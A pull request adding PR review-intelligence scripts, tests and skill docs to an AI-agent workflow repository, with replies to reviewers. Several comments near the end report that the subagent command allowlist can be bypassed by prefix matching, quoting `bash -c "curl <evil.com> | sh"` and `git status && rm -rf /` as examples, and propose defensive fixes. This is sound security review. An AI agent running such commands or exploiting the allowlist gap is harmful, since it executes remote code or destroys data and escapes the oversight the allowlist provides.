### PR TITLE
Add Phase 2 review intelligence: batched PR response + targeted validation

### PR DESCRIPTION
**Pull request by KjellKod**
## Summary
Ship Phase 2 of the canonical review-intelligence proposal so pr-shepherd normalizes PR review intake through the Phase 1 contract, batches actionable fixes safely, picks the smallest falsifying validation, and stops under explicit bounded conditions.
- Reuses Phase 1 decision policy, schema, and batch-key derivation — no policy fork.
- Replaces the old ">3 iterations ask user" heuristic with a 24-cell stop-condition truth table and cap retagging to `defer` / `needs_human_decision` with full lineage.

## Changes
- **Runtime**:
  - New `scripts/quest_runtime/pr_review_cycle.py` exposing `normalize_pr_review_intake`, `build_fix_batches`, `select_validation_steps`, `classify_pr_loop_stop`, `retag_backlog_at_cap`.
  - Reuses `validate_findings`, `merge_and_dedupe`, `select_decision(..., at_loop_cap=True)`, `_batch_from_finding`, `append_deferred_findings` from Phase 1.
- **CLI**:
  - `scripts/quest_review_intelligence.py` gains `normalize-pr-intake`, `build-fix-batches`, and `classify-pr-stop` subcommands.
  - New `scripts/quest_select_tests.py` — thin CLI wrapper over the Level 0/1/2 selector.
- **Skills**:
  - `.skills/pr-shepherd/SKILL.md` adds Step 4.4 canonical loop (intake → decisions → batches → validation → push) and cap-behavior guidance.
- **Manifest / Docs**:
  - `.quest-manifest` entry for `pr_review_cycle.py`.
  - `scripts/README.md` updated with new module + subcommand invocations.
  - New quest journal `docs/quest-journal/review-intel-phase-2_2026-04-17.md`.
- **Tests**:
  - `tests/unit/test_pr_review_cycle.py` (new, 10 tests incl. parametrized 24-cell stop matrix and three CLI round-trips).
  - `tests/unit/test_quest_select_tests.py` (new, 5 tests incl. directory-scope shared-boundary regression).
  - `tests/unit/test_review_intelligence.py` regressions for normalized-intake + cap-loop decision reuse.

## Validation
- [x] **Run the full test suite**: `python3 -m pytest -q`. Expected: `351 passed`, no warnings.
- [x] **Walkthrough — PR intake normalization**: `printf '{"ci_checks":[{"job":"unit","state":"failing","failed_path":"scripts/x.py","kind_hint":"test_failure"}],"inline_comments":[{"commenter":"alice","body":"blocker memory leak","path":"scripts/x.py","line":42}],"general_comments":[],"existing_findings":[]}' > /tmp/intake.json && python3 scripts/quest_review_intelligence.py normalize-pr-intake --input /tmp/intake.json --output /tmp/findings.json && python3 scripts/quest_review_intelligence.py validate-findings --input /tmp/findings.json`. Expected: `ok: true`, two findings — one `pr-ci-001` with severity `high`, one `pr-inline-001` upgraded to `high` by the `blocker` keyword.
- [x] **Walkthrough — stop-condition matrix**: `python3 scripts/quest_review_intelligence.py classify-pr-stop --ci-state unknown --actionable 2 --iteration 3`. Expected: JSON with `stop: true`, `outcome: "cap_enforced"`, `retag_required: true`. Then rerun with `--ci-state green --actionable 0 --iteration 1` — expected `outcome: "success"`, `stop: true`, `retag_required: false`.
- [x] **Walkthrough — test selector**: `printf '{"finding_id":"F-001","source":"test","kind":"correctness","severity":"high","confidence":"high","path":"scripts/quest_runtime/foo.py","line":10,"summary":"test","why_it_matters":"test","evidence":["e"],"action":"fix","needs_test":true,"write_scope":["scripts/quest_runtime"],"related_acceptance_criteria":["AC-1"]}' > /tmp/f.json && python3 scripts/quest_select_tests.py --finding /tmp/f.json`. Expected: ordered `validation_steps` including Level 0 guards and at least one Level 2 step (directory-scope shared boundary triggers escalation per the new regression test).

Watch for: `classify-pr-stop` defaults the deferred JSONL path to `.quest/backlog/deferred_findings.jsonl` (relative to cwd) — confirm expected location when running from non-repo directories.

## Notes
- Review memory loading (per `ideas/2026-04-13-quest-memory-architecture.md`) remains out of scope for a follow-up quest. Phase 1's deferred-findings reservoir is already the reach across quest + PR review cycles — this PR extends that same reservoir via the new cap-retag path.
- Implements `ideas/2026-04-13-review-intelligence-canonical.md` Sections 3 and 4.

<pre>
     ▐▛███▜▌
    ▝▜█████▛▘
      ▘▘ ▝▝
Quest/Co-Authored by
Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
Co-Authored-By: Codex GPT-5.4 <noreply@openai.com>
in collaboration with KjellKod <kjell.hedstrom@gmail.com>
</pre>

### CODE REVIEW

File: scripts/quest_runtime/pr_review_cycle.py [hunk 1]
```diff
@@ -0,0 +1,651 @@
...
+
+    for paths in by_dir.values():
+        paths.sort()
+
+    for source_path in _candidate_source_paths(finding):
+        source_dir = str(PurePosixPath(source_path).parent)
+        if source_dir == ".":
+            source_dir = ""
+
+        current = PurePosixPath(source_dir) if source_dir else None
```
[the remark this answers is not in the document]
Comment (KjellKod) [reply scripts/quest_runtime/pr_review_cycle.py]: Fixed in b821f76. Replaced the `source_dir = "" / current = None` guard with `current = PurePosixPath(source_dir or ".")` so root-level source files now enter the lookup loop. New regression `test_select_validation_steps_finds_root_level_nearest_tests` proves `setup.py` at repo root resolves `test_setup.py` as a Level 1 target.

- Reviewed by Claude Opus 4.7, in collaboration with KjellKod

File: scripts/quest_runtime/pr_review_cycle.py [hunk 2]
```diff
@@ -0,0 +1,651 @@
...
+        inline_counter += 1
+        commenter = str(comment.get("commenter") or "unknown-reviewer").strip()
+        commenter = commenter or "unknown-reviewer"
+        body = str(comment.get("body") or "").strip()
+        path = str(comment.get("path") or "").strip() or "pr/inline"
+        line = _finding_line(comment.get("line"))
+        body_lower = body.lower()
+        severity = (
+            "high"
+            if any(keyword in body_lower for keyword in BLOCKER_KEYWORDS)
```
[the remark this answers is not in the document]
Comment (KjellKod) [reply scripts/quest_runtime/pr_review_cycle.py]: Fixed in b821f76. Blocker detection now tokenizes `body_lower.split()`, strips `.,:;!?()[]{}\"'` from each token, and set-intersects against `BLOCKER_KEYWORDS`. "nonblocking" as a word no longer matches; "critical!" still does. New regression `test_normalize_pr_review_intake_tokenized_blocker_upgrade` covers all three cases (nonblocking → medium, blocker → high, critical! → high).

- Reviewed by Claude Opus 4.7, in collaboration with KjellKod

File: scripts/quest_runtime/pr_review_cycle.py [hunk 3]
```diff
@@ -0,0 +1,651 @@
...
+    ALLOWED_DECISIONS,
+    _batch_from_finding,
+    merge_and_dedupe,
+    select_decision,
+    validate_findings,
+)
+
+INTAKE_SOURCES = ("ci_check", "inline_comment", "general_comment", "existing_finding")
+BLOCKER_KEYWORDS = ("blocker", "blocking", "critical")
+DEFAULT_LOOP_CAP = 3
```
[the remark this answers is not in the document]
Comment (KjellKod) [reply scripts/quest_runtime/pr_review_cycle.py]: Fixed in b821f76. Renamed `DEFAULT_LOOP_CAP` → `FALLBACK_LOOP_CAP` and added `resolve_loop_cap()` that reads `.ai/allowlist.json` → `gates.max_fix_iterations` (falls back to 3 only if the file is missing/unreadable). `classify_pr_loop_stop` now takes `cap: int | None` and resolves on the fly. The `classify-pr-stop` CLI honors the allowlist unless `--cap` is explicitly overridden. Two new regression tests cover the happy path (allowlist hit) and the fallback (missing file).

- Reviewed by Claude Opus 4.7, in collaboration with KjellKod

File: .skills/pr-shepherd/SKILL.md [hunk 4]
```diff
@@ -37,6 +37,32 @@ Use **inline-first** commenting by default.
...
+   - `existing_findings`
+2. Normalize intake to canonical findings:
+   - `python3 scripts/quest_review_intelligence.py normalize-pr-intake --input <intake.json> --output <review_findings.json>`
+3. Build decision backlog with shared policy:
+   - `python3 scripts/quest_review_intelligence.py build-backlog --findings <review_findings.json> --output <review_backlog.json>`
+4. Build actionable non-overlapping batches:
+   - `python3 scripts/quest_review_intelligence.py build-fix-batches --backlog <review_backlog.json> --output <fix_batches.json>`
+5. Select concrete validation per actionable finding:
+   - `python3 scripts/quest_select_tests.py --finding <finding.json> [--repo-inventory <repo_inventory.json>]`
+   - Persist returned `validation_steps` on backlog items before batching so validation scope is stable.
```
[the remark this answers is not in the document]
Comment (KjellKod) [reply .skills/pr-shepherd/SKILL.md]: Fixed in b821f76. The "before batching" phrase was a leftover from an earlier draft where selector ran in a different order. Rewrote to "Persist returned `validation_steps` on backlog items so validation scope is stable for execution." which matches the actual flow (batching is step 4, selector is step 5, execution is step 6).

- Reviewed by Claude Opus 4.7, in collaboration with KjellKod

File: tests/unit/test_pr_review_cycle.py [hunk 5]
```diff
@@ -0,0 +1,463 @@
...
+        ),
+        _backlog_item(
+            "F-002",
+            write_scope=["scripts/quest_runtime/pr_review_cycle.py"],
+            validation_steps=_validation_step("tests/unit/test_one.py"),
+        ),
+    ]
+
+    batches = build_fix_batches(items)
+    assert len(batches) == 2
```
[the remark this answers is not in the document]
Comment (KjellKod) [reply tests/unit/test_pr_review_cycle.py:208]: Fixed in b821f76. You were right — F-001 `["scripts/quest_runtime"]` and F-002 `["scripts/quest_runtime/pr_review_cycle.py"]` produced different `batch_key` values (first sorted entry), so the items split into separate groups BEFORE overlap partitioning ever ran. The test passed but for the wrong reason. F-002 now carries BOTH entries so they share `batch_key="scripts/quest_runtime"` and the overlap partitioning is what forces the split. Added a `batch_id` set assertion to pin down that overlap is the actual cause.

- Reviewed by Claude Opus 4.7, in collaboration with KjellKod

File: tests/unit/test_pr_review_cycle.py [hunk 6]
```diff
@@ -0,0 +1,463 @@
...
```
[the remark this answers is not in the document]
Comment (KjellKod) [reply tests/unit/test_pr_review_cycle.py:233]: Fixed in b821f76. Same root cause as the parent/child test — F-002 now contains `["scripts/quest_runtime/", "scripts/quest_runtime/pr_review_cycle.py"]` so both items share `batch_key="scripts/quest_runtime/"` and the trailing-slash normalization in the overlap predicate is what produces the split. Pinned with a `batch_id` set assertion.

- Reviewed by Claude Opus 4.7, in collaboration with KjellKod

File: ideas/2026-04-17-persisted-celebrations-and-brief-in-cheers.md [hunk 7]
```diff
@@ -0,0 +1,281 @@
...
+| `handoff-contract-fix_2026-02-09__2228` | ✓ |
+| `thin-orchestrator_2026-02-09__1845` | ✓ |
+| `skill-strategy_2026-02-09__1200` | ✓ |
+| `installer-script_2026-02-04__1841` | ✓ |
+| `ci-quest-validation_2026-02-04__1532` | ✓ |
+| `interactive-plan-presentation_2026-02-04__1516` | ✓ |
+| `validate-and-launch_2026-02-04__1045` | ✓ |
+| `weekly-update-check_2026-02-04__2349` | — |
+
+Totals: **35** archived quests without celebrations; **21** have journals, **14** do not.
```
[the remark this answers is not in the document]
Comment (KjellKod) [reply ideas/2026-04-17-persisted-celebrations-and-brief-in-cheers.md]: Fixed in b821f76. Recounted the table: 20 YES, 15 no. Updated the totals line to match.

- Reviewed by Claude Opus 4.7, in collaboration with KjellKod

File: ideas/2026-04-17-persisted-celebrations-and-brief-in-cheers.md [hunk 8]
```diff
@@ -0,0 +1,314 @@
...
+
+   **Rule:**
+   - Frontmatter carries an `origin:` marker: `step7-original` | `cold-regen` | `post-pr-revision`.
+   - `/celebrate` on a quest that has no file yet: write as `step7-original` (or `cold-regen` if invoked on an archived quest without a prior Step-7 write).
+   - `/celebrate` on a quest that has a `step7-original` file:
+     - Detect meaningful context change since the original (new commits on branch, PR comments, merged/closed state). Cheap checks only — `git log`, `gh pr view`.
+     - **No new context** → warn "original celebration is authoritative and nothing meaningful has changed since; the current regeneration has less context than the original. Overwrite anyway? (y/N)" with default **no**.
+     - **New context exists** → offer a revision mode: append `## Revision: <date>` section to the existing file *or* write a sibling `<slug>_<date>__revision-<YYYYMMDD>.md`. Pick per invocation. Mark the revision's `origin:` as `post-pr-revision` and add a `revision-of:` frontmatter pointer.
```
[the remark this answers is not in the document]
Comment (KjellKod) [reply ideas/2026-04-17-persisted-celebrations-and-brief-in-cheers.md]: Fixed in b821f76. Valid catch — I conflated two revision modes. The append path now keeps the original frontmatter intact and places revision metadata inline in the section body, while only the sibling-file path carries `origin: post-pr-revision` + `revision-of:` in its own frontmatter. Applied the one-line text correction you suggested.

- Reviewed by Claude Opus 4.7, in collaboration with KjellKod

File: .quest-manifest [hunk 9]
```diff
@@ -82,6 +82,7 @@ scripts/quest_checks/cli.py
 scripts/quest_runtime/__init__.py
 scripts/quest_runtime/artifacts.py
 scripts/quest_runtime/claude_runner.py
+scripts/quest_runtime/pr_review_cycle.py
 scripts/quest_runtime/review_intelligence.py
```
[the remark this answers is not in the document]
Comment (KjellKod) [reply .quest-manifest:87]: Fixed in 9138a06. Added `scripts/quest_select_tests.py` to `.quest-manifest` and extended the validator's `EXPECTED_PATTERNS` to include both `scripts/quest_review_intelligence.py` and `scripts/quest_select_tests.py` so future review-intelligence CLIs are caught automatically rather than relying on the current narrow per-file allowlist.

- Reviewed by Claude Opus 4.7, in collaboration with KjellKod

File: scripts/quest_runtime/pr_review_cycle.py [hunk 10]
```diff
@@ -0,0 +1,651 @@
...
+
+    normalized_findings: list[dict[str, Any]] = []
+    ci_counter = 0
+    inline_counter = 0
+    general_counter = 0
+
+    for check in ci_checks:
+        job = str(check.get("job") or "unknown-job").strip() or "unknown-job"
+        state = str(check.get("state") or "unknown").strip().lower() or "unknown"
+        if state in CI_GREEN_STATES:
```
[the remark this answers is not in the document]
Comment (KjellKod) [reply scripts/quest_runtime/pr_review_cycle.py]: Fixed in 9138a06. Added `CI_FAILURE_STATES = ("failing", "failure", "failed", "error", "cancelled", "timed_out", "action_required")` and changed the normalization guard from `state in CI_GREEN_STATES: continue` to `state not in CI_FAILURE_STATES: continue`. Green, pending, unknown, in_progress, queued, etc. are all skipped as non-actionable; only confirmed failures produce findings. New regression `test_normalize_pr_review_intake_skips_pending_and_unknown_ci_states` feeds six states (green, pending, unknown, in_progress, failing, error) and asserts only the last two surface as findings.

- Reviewed by Claude Opus 4.7, in collaboration with KjellKod

File: scripts/quest_review_intelligence.py [hunk 11]
```diff
@@ -66,6 +84,87 @@ def _cmd_build_backlog(args: argparse.Namespace) -> int:
...
+                or _quest_id_from_backlog_path(backlog_path),
+                "deferred_at": args.deferred_at or utc_now_iso(),
+                "defer_reason": args.defer_reason,
+                "proposed_followup": args.proposed_followup,
+            }
+            deferred_count = append_deferred_findings(
+                Path(args.deferred_jsonl),
+                deferred_items,
+                lineage,
+            )
```
[the remark this answers is not in the document]
Comment (KjellKod) [reply scripts/quest_review_intelligence.py:224]: Fixed in 9138a06. `--deferred-jsonl` default is now `None`. When omitted and `--backlog` is provided, a new `_deferred_jsonl_from_backlog` helper walks up the resolved backlog path to the enclosing `.quest/` directory and writes to `<.quest>/backlog/deferred_findings.jsonl` there, not under cwd. Falls back to the old cwd-relative default only when no backlog is supplied. New regression `test_cli_classify_pr_stop_derives_deferred_jsonl_from_backlog_when_cwd_unrelated` runs the CLI from an unrelated working directory and asserts the deferred record lands under the real repo's `.quest/`, not the cwd.

- Reviewed by Claude Opus 4.7, in collaboration with KjellKod

File: scripts/quest_runtime/pr_review_cycle.py [hunk 12]
```diff
@@ -0,0 +1,673 @@
...
+    _batch_from_finding,
+    merge_and_dedupe,
+    select_decision,
+    validate_findings,
+)
+
+INTAKE_SOURCES = ("ci_check", "inline_comment", "general_comment", "existing_finding")
+BLOCKER_KEYWORDS = ("blocker", "blocking", "critical")
+_BLOCKER_TOKEN_STRIP = ".,:;!?()[]{}\"'"
+FALLBACK_LOOP_CAP = 3
```
[the remark this answers is not in the document]
Comment (KjellKod) [reply scripts/quest_runtime/pr_review_cycle.py:21]: Fixed in c4d1727. Same cwd-bleed class as the earlier deferred-JSONL finding — `resolve_loop_cap` was reading a module-level `_ALLOWLIST_PATH = Path(".ai/allowlist.json")` resolved against cwd. Added `allowlist_path_from_context(context_path)` that walks up a known-in-repo path (the backlog) to find the first enclosing `.ai/allowlist.json`. `classify_pr_loop_stop` now takes an optional `allowlist_path` and threads it into `resolve_loop_cap`. The CLI passes `allowlist_path_from_context(args.backlog)` so cap enforcement follows the target repo, not cwd. Two new regressions: a pure-function test for the walk-up behavior and a CLI-level test run from an unrelated cwd that asserts the classifier picks up the target repo's configured cap (5), not the fallback (3).

- Reviewed by Claude Opus 4.7, in collaboration with KjellKod

File: scripts/quest_runtime/pr_review_cycle.py [hunk 13]
```diff
@@ -0,0 +1,714 @@
...
+    repo, typically the backlog or a quest artifact) and returns the first
+    ancestor that contains ``.ai/allowlist.json``. Falls back to the
+    module-level cwd-relative default when no context is given or no
+    enclosing repo is found.
+    """
+
+    if context_path is None:
+        return _ALLOWLIST_PATH
+    try:
+        resolved_parents = context_path.resolve().parents
```
[the remark this answers is not in the document]
Comment (KjellKod) [reply scripts/quest_runtime/pr_review_cycle.py]: Fixed in the next commit. Iteration now includes `resolved` itself before `resolved.parents`, so passing a directory context (like the repo root) finds `<repo>/.ai/allowlist.json` at that level instead of skipping past. File contexts (backlog paths) still work — the nested `.ai/` check under a file path never exists and the loop continues to ancestors as before. New regression `test_allowlist_path_from_context_accepts_repo_root_directory` pins the directory case.

- Reviewed by Claude Opus 4.7, in collaboration with KjellKod

**Comment by KjellKod** [comment]
While not a file that was changed in this PR we have decided to fix the issue here 

—-

**The Problem**
In .claude/hooks/enforce-allowlist.sh (line ~78), command validation uses prefix matching:
```
if [[ "$command" == "$allowed"* ]]; then
    return 0  # allows anything starting with the prefix
fi
```

And in .ai/allowlist.json, both builder_agent and fixer_agent have bare "bash" in their allowed commands list. So bash -c "curl <evil.com> | sh" passes validation because it starts with bash.

### My Opinion

This is a real bypass, but the blast radius is limited right now because:
	1.	The hook isn’t even enabled — .claude/settings.json has no PreToolUse hook wired up, so the allowlist isn’t enforced at all currently
	2.	The agents are AI subagents running in a sandboxed session, not untrusted external code
That said, the fix is straightforward and the reviewer is right to flag it:
	•	Remove bare bash from the allowlist — if agents need specific bash commands, list them explicitly (bash scripts/validate-quest-state.sh, etc.)
	•	Consider exact matching or tokenized first-command matching instead of prefix matching — prefix matching also means git status && rm -rf / passes if git status is allowed
	•	Add shell metacharacter rejection — block commands containing &&, ||, ;, |, backticks, or $() unless the full compound command is explicitly allowed
The prefix approach was probably chosen for convenience (allow python3 -m unittest discover without listing every variant), but bare bash and bare python entries defeat the purpose of having an allowlist at all.

**Comment by KjellKod** [comment]
On `scripts/quest_checks/cli.py` near line 30



P1: This CLI entrypoint is never executed because `main()` is defined but not called, so the validation/test commands do not run when invoking the script.

<details>
<summary>Prompt for AI agents</summary>

```text
Check if this issue is valid — if so, understand the root cause and fix it. At scripts/quest_checks/cli.py, line 31:

<comment>This CLI entrypoint is never executed because `main()` is defined but not called, so the validation/test commands do not run when invoking the script.</comment>

<file context>
@@ -0,0 +1,31 @@
+        completed = subprocess.run(command, cwd=REPO_ROOT, check=False)
+        if completed.returncode != 0:
+            return completed.returncode
+    return 0
</file context>
```

</details>

**Comment by KjellKod** [comment]
### Recommended Fix
	1.	Remove bare bash and bare python from the allowlist — list specific commands instead (bash scripts/validate-quest-state.sh, python3 -m pytest, etc.)
	2.	Replace prefix matching with tokenized first-command matching or exact matching — prefix matching also means git status && rm -rf / passes if git status is allowed
	3.	Add shell metacharacter rejection — block commands containing &&, ||, ;, |, backticks, or $() unless the full compound command is explicitly allowed
	4.	Enable the PreToolUse hook in .claude/settings.json to actually activate enforcement
	5.	Add test cases for bypass scenarios — there are currently none for enforce-allowlist.sh
Summary
The prefix approach was likely chosen for convenience (allow python3 -m unittest discover without listing every variant), but bare bash and bare python entries defeat the purpose of having an allowlist. The fix is straightforward: explicit commands + metacharacter rejection.

**Comment by KjellKod** [comment]
Thoughts about this?

scripts/quest_claude_prompt.py

P2: Constructing `bridge_script` with `Path(args.cwd) / ...` breaks relative `--cwd` values by double-applying the working directory.

<details>
<summary>Prompt for AI agents</summary>

```text
Check if this issue is valid — if so, understand the root cause and fix it. At scripts/quest_claude_probe.py, line 31:

<comment>Constructing `bridge_script` with `Path(args.cwd) / ...` breaks relative `--cwd` values by double-applying the working directory.</comment>

<file context>
@@ -0,0 +1,49 @@
+    result = run_bridge_probe(
+        cwd=args.cwd,
+        quest_dir=args.quest_dir,
+        bridge_script=Path(args.cwd) / args.bridge_script,
+        model=args.model,
+        timeout=args.timeout,
</file context>
```

</details>

**Comment by KjellKod** [comment]
Thoughts about this? `.ai/allowlist.json`

gh pr view.* is treated as a literal prefix, not a regex, so intended gh pr view ... commands won’t match and will be blocked


P2: `gh pr view.*` is treated as a literal prefix, not a regex, so intended `gh pr view ...` commands won’t match and will be blocked.

<details>
<summary>Prompt for AI agents</summary>

```text
Check if this issue is valid — if so, understand the root cause and fix it. At .ai/allowlist.json.quest_updated, line 45:

<comment>`gh pr view.*` is treated as a literal prefix, not a regex, so intended `gh pr view ...` commands won’t match and will be blocked.</comment>

<file context>
@@ -0,0 +1,88 @@
+    "planner_agent": {
+      "file_write": [".quest/**", "docs/**", "ideas/**", ".ai/**", "*.md"],
+      "file_read": ["**"],
+      "bash": ["find", "rg", "grep", "wc", "ls", "tree", "git status", "git diff", "gh pr view.*"]
+    },
+    "plan_review_a": {
</file context>
```

</details>

File: .skills/pr-shepherd/SKILL.md [hunk 14]
```diff
@@ -37,6 +37,32 @@ Use **inline-first** commenting by default.
...
+1. Collect one intake payload per cycle:
+   - `ci_checks`
+   - `inline_comments`
+   - `general_comments`
+   - `existing_findings`
+2. Normalize intake to canonical findings:
+   - `python3 scripts/quest_review_intelligence.py normalize-pr-intake --input <intake.json> --output <review_findings.json>`
+3. Build decision backlog with shared policy:
+   - `python3 scripts/quest_review_intelligence.py build-backlog --findings <review_findings.json> --output <review_backlog.json>`
+4. Build actionable non-overlapping batches:
```
[the remark this answers is not in the document]
Comment (KjellKod) [reply .skills/pr-shepherd/SKILL.md]: Fixed in a7505dc. You were right — this was a real ordering bug, not a wording issue. My earlier rewrite of "persist before batching" → "persist for execution" (b821f76) was cosmetic; the text was contradictory because the order was wrong.

Changes:
- New `scripts/quest_review_intelligence.py select-batch-validation` subcommand: walks the backlog, calls `select_validation_steps` for every `fix_now`/`verify_first` item, persists `validation_steps` in place.
- `.skills/pr-shepherd/SKILL.md` Step 4.4 reordered: validation selection now runs BEFORE batching, with an explicit note on why the order matters.
- `test_canonical_pipeline_order_yields_multi_item_batches`: drives the documented order end-to-end, two fix_now items with shared batch_key and non-overlapping scopes collapse into one multi-item batch after select-batch-validation.
- `test_skipping_select_batch_validation_forces_one_item_batches_regression_guard`: explicitly reproduces the old bug (skip select → two one-item batches) so a future refactor removing the select step fails loudly.

Full suite 362 passed (was 360, +2 regression tests for this class of bug).

- Reviewed by Claude Opus 4.7, in collaboration with KjellKod

File: ideas/2026-04-20-allowlist-pattern-hygiene.md [hunk 15]
```diff
@@ -0,0 +1,167 @@
...
+
+**No regex.** Regex in a permission matcher is a foot-cannon. Exact and tokenized-prefix are plenty.
+
+### 3. Fix the three existing `gh pr view.*` entries
+
+Replace `"gh pr view.*"` → `"gh pr view"` (token-count 3, matches `gh pr view <args>`).
+
+## Files to change
+
+- `.ai/allowlist.json` — every role's `bash` list (6 roles: `planner_agent`, `plan_review_a`, `plan_review_b`, `arbiter_agent`, `builder_agent`, `code_review_agent`, `fixer_agent`).
```
[the remark this answers is not in the document]
Comment (KjellKod) [reply ideas/2026-04-20-allowlist-pattern-hygiene.md]: Fixed — text now says "7 roles" to match the enumeration.

- Reviewed by Claude Opus 4.7, in collaboration with KjellKod

File: scripts/README.md [hunk 16]
```diff
@@ -9,14 +9,16 @@ Build and utility scripts for the Quest repository.
...
 | `quest_claude_probe.py` | Probes the Claude bridge by requiring a real artifact write and `handoff.json` under the quest logs directory. |
 | `quest_state.py` | Updates `.quest/<id>/state.json` consistently and refreshes `updated_at`. |
 | `quest_startup_branch.py` | Creates the startup branch or worktree for a new quest from `.ai/allowlist.json` and returns machine-readable branch context JSON. |
 | `quest_claude_runner.py` | Runs Claude-designated Quest roles through the additive Codex-host Claude adapter, using `scripts/quest_claude_bridge.py` as transport plus `bypassPermissions`, explicit `--add-dir` access, handoff polling, and `context_health.log` updates. Native Claude-led Quest behavior stays on `Task(...)`. |
-| `quest_review_intelligence.py` | Thin CLI wrapper around `quest_runtime/review_intelligence.py` (`validate-findings`, `merge-findings`, `build-backlog`, `append-deferred`, `scan-backlog`). |
+| `quest_review_intelligence.py` | CLI wrapper around review-intelligence helpers (`validate-findings`, `merge-findings`, `build-backlog`, `append-deferred`, `scan-backlog`, `normalize-pr-intake`, `build-fix-batches`, `classify-pr-stop`). |
```
[the remark this answers is not in the document]
Comment (KjellKod) [reply scripts/README.md]: Fixed. The README Quick Start now shows the full 5-step PR pipeline in order (normalize → build-backlog → select-batch-validation → build-fix-batches → classify-pr-stop) with an explicit header note on why the order matters. The subcommand table entry for `quest_review_intelligence.py` now lists `select-batch-validation`. Single-finding `quest_select_tests.py` is reframed as a debugging helper, not a pipeline step.

- Reviewed by Claude Opus 4.7, in collaboration with KjellKod
